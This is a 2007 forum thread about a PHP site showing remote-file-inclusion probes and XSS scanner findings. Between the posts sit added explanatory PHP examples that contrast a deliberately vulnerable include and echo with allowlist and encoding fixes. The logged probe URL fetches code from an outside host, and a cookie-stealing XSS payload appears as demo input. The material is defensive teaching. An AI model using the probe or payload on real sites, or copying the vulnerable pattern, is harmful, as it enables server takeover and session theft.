Need help about XSS (Cross Site Scripting) issue in my site

Discussion in 'Apache' started by komrad, Aug 15, 2007.

  1. #1
    Hello,

    Some days ago, I checked my site visitor statistics and I was really wondering, because there were many strange URLs found.

    Here are some of them:

    http://www.mydomain.com/order.php?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt

    The part of the URL in bold didn't exist in the site.

    So, could you give me a solution to this problem? What should I do?
    Are they dangerous?

    I really need your help. Thanks in advance.
     
    komrad, Aug 15, 2007 IP
  2. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #2
    Also, I have checked it with a web application security scanner, and indeed there are many parts of the site's script vulnerable to XSS (cross site scripting) attack.
     
    komrad, Aug 15, 2007 IP
  3. powerspike

    powerspike Peon

    Messages:
    312
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #3
    You need to see if you can get that fixed ASAP; it usually indicates that they might be able to get into your server via it - which is obviously a bad thing.

    Some of the attacks basically are where you can get an application to open a remote URL with code in it, so it'll run on your server (which is obviously a very bad thing).
     
    powerspike, Aug 16, 2007 IP
  4. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #4
    @powerspike
    So, do you have any solutions? Or a direction where I should find the right answer? Anybody?
     
    komrad, Aug 16, 2007 IP
  5. CodyRo

    CodyRo Peon

    Messages:
    365
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    0
    #5
    It's most likely some script kiddie just running queries on any GET on your page... though it shouldn't be an issue as long as the script is validating any input / register_globals is off.
     
    CodyRo, Aug 16, 2007 IP
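The attack powerspike describes in #3 (an application that opens a remote URL and runs the code in it) and the input validation CodyRo mentions in #5, as an added example that is not part of the thread or of the poster's site. It models a hypothetical order.php that chooses a language file from the `lang` parameter, which is what a request like `order.php?lang=http://.../cmd.txt` is probing for. All file names, the allowlist and the sample inputs are assumptions; the logged attack URL is the one from post #1.

```php
<?php
// Added example, not code from the thread or from the poster's site. It models
// a hypothetical order.php that picks a language file from ?lang=, the pattern
// the logged request is probing for. Names, paths and sample inputs are assumed.
declare(strict_types=1);

// Vulnerable shape: the request parameter becomes the include path. With
// allow_url_fopen (and, from PHP 5.2, allow_url_include) enabled, PHP fetches
// ?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt over HTTP and executes it
// as PHP on the server. Any suffix the script appends (such as '.php') can be
// neutralised by ending the URL with '?'. With register_globals=On the same hole
// exists even if the script never reads $_GET, because $lang is populated
// directly from the query string.
function language_file_vulnerable(string $lang): string
{
    return $lang;                 // include($lang) in the real script
}

// Hardened: the client only picks a key from a fixed allowlist. No string from
// the request ever reaches the filesystem or a URL wrapper.
const LANGUAGE_FILES = [
    'en' => 'lang/en.php',
    'de' => 'lang/de.php',
    'id' => 'lang/id.php',
];

function language_file(string $lang): string
{
    if (isset(LANGUAGE_FILES[$lang])) {
        return LANGUAGE_FILES[$lang];
    }
    // Log the attempt (this is what shows up as "strange URLs" in statistics),
    // then fall back to the default rather than failing open.
    error_log('order.php: rejected lang parameter ' . var_export($lang, true));
    return LANGUAGE_FILES['en'];
}

// Constructed sample inputs: one legitimate value, the remote include attempt
// from the access log, and a local path traversal attempt.
$samples = [
    'de',
    'http://rpgnet.com/newrpgnet/intranet/cmd.txt',
    '../../../../etc/passwd',
];

foreach ($samples as $lang) {
    printf("%-48s vulnerable -> %-48s hardened -> %s\n",
        $lang, language_file_vulnerable($lang), language_file($lang));
}

// In order.php itself (hypothetical):
//   require_once language_file($_GET['lang'] ?? 'en');
```

The allowlist is the fix; a denylist that rejects `http://` misses `ftp://`, `data:` and local traversal. Independently of the code, set `allow_url_include = Off` and, unless something needs it, `allow_url_fopen = Off` and `register_globals = Off` in php.ini, so that an include that does get past validation still cannot pull code from a remote host. Searching the access log for `=http` will show which other parameters are being probed the same way.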
  6. rootbinbash

    rootbinbash Peon

    Messages:
    2,198
    Likes Received:
    88
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Dude, how can you expect a solution without seeing the code or the site?
     
    rootbinbash, Aug 16, 2007 IP
  7. InfiniteTech

    InfiniteTech Active Member

    Messages:
    380
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    70
    #7
    Right.

    We are not hackers here to find that out.
     
    InfiniteTech, Aug 16, 2007 IP
  8. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #8
    I won't let you know which site it is, for security reasons.
    But here are some of the scanning results using Acunetix (web vulnerability scanner):
    And here's its suggestion about how to fix it:
    Do you have any idea what it is and how to filter metacharacters from user input?

    Your help would be appreciated.
     
    komrad, Aug 16, 2007 IP
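What "filter metacharacters from user input" means in practice for the XSS findings in #8, as an added example that is not code from the thread or from the scanner's report: encode untrusted input for the context it is written into (HTML text, attribute value, inline script) instead of trying to strip "bad" characters. The page fragments, the function names and the payload are constructed for the demo; the payload is the kind of string a scanner injects into every GET parameter.

```php
<?php
// Added example, not code from the thread or from the scanner's report. Shows
// context-aware output encoding for XSS in PHP. Markup, function names and the
// payload below are constructed for the demo.
declare(strict_types=1);

// Constructed payload: closes the attribute and tag it lands in, then adds a script.
const PAYLOAD = '"><script>alert(document.cookie)</script>';

// Vulnerable: the parameter is echoed straight into the page.
function greet_vulnerable(string $name): string
{
    return '<p>Hello ' . $name . '</p>';
}

// HTML text and double-quoted attribute values: turn & < > " ' into entities.
// ENT_QUOTES matters because the default leaves single quotes alone, which is
// not enough inside value='...'. Always pass the charset explicitly.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function greet_html(string $name): string
{
    return '<p>Hello ' . h($name) . '</p>';
}

function search_box(string $query): string
{
    return '<input type="text" name="q" value="' . h($query) . '">';
}

// Inside <script>, HTML entities are not decoded, so h() is the wrong tool.
// Emit a JSON literal with the HTML-significant characters hex-escaped, so a
// '</script>' in the value cannot close the block.
function inline_js(string $name): string
{
    $literal = json_encode($name, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return '<script>var name = ' . $literal . ';</script>';
}

// strip_tags() is not a fix: it removes <script> here but keeps the quote that
// breaks out of the attribute, and it does nothing about event handler
// attributes or javascript: URLs.
function greet_strip_tags(string $name): string
{
    return '<input type="text" name="name" value="' . strip_tags($name) . '">';
}

foreach ([
    'vulnerable' => greet_vulnerable(PAYLOAD),
    'html text ' => greet_html(PAYLOAD),
    'attribute ' => search_box(PAYLOAD),
    'script    ' => inline_js(PAYLOAD),
    'strip_tags' => greet_strip_tags(PAYLOAD),
] as $label => $html) {
    echo $label, ': ', $html, "\n";
}
```

Running it shows the payload intact in the vulnerable and strip_tags versions and neutralised in the other three. Validation on the way in (an allowlist for fields like `lang`, a numeric check for IDs) is still worth doing, but free-text fields such as a name or search term have to be encoded on the way out, at the point where they are written into the page, because that is where the context is known.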
  9. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #9
    Hi, I can give you the site script if you want to help me.
     
    komrad, Sep 25, 2007 IP